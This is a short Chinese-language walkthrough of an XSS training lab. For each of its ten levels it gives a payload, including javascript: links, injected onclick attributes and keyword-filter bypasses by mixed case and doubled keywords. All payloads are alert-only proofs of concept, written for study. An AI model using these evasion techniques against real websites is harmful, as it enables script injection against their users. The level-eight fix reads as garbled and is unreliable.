xss挑战过关教程
准备环境
首先需要一个 xss通关挑战源码 需要准备一个PHPstuday 最后需要一台可以正常联网的电脑
第一关
没有任何保护随便一条脚本语句均可
<a href=javascript:/00/,alert(%22M%22)>M</a>
第二关
"> <a href=javascript:/00/,alert(%22M%22)>M</a>//
对比上一关多了个闭合
第三关
代码是对的就是执行不出来那我们找一个不需要>的
'οnclick='javascript:alert(1)'
第四关
改成双引号就可以了
"onclick='javascript:alert(1)'
第五关
复制第一关的代码即可
黑名单过滤 避免出现 onclick和脚本关键字即可
"> <a href=javascript:/00/,alert(%22M%22)>M</a>//
第六关
我们用第5关的代码发现href被过滤掉了
"> <a hRef=javascript:/00/,alert(%22M%22)>M</a>//
大写后发现正常
第七关
好家伙直接给我屏蔽了关键字
双写试试
"> <a hhrefref=javascript:/00/,alert(%22m%22)>m</a>//
成功!!!!
"> <a hhrefref=javasscriptcript:/00/,alert(%22m%22)>m</a>//
第八关
写入此代码发现无法正确跳转
javascript:/00/,alert(%22m%22) //错的
他把脚本关键字过滤了
双写也没办法
需要用转意字符太恶心了吧
javascript:alert(1)
第九关
构造payload
加一个正确的注释即可
javascript:alert(1)/*http://xiaowan.xyz*/
第十关
构造注入点
&t_sort=" type="text" οnclick="alert()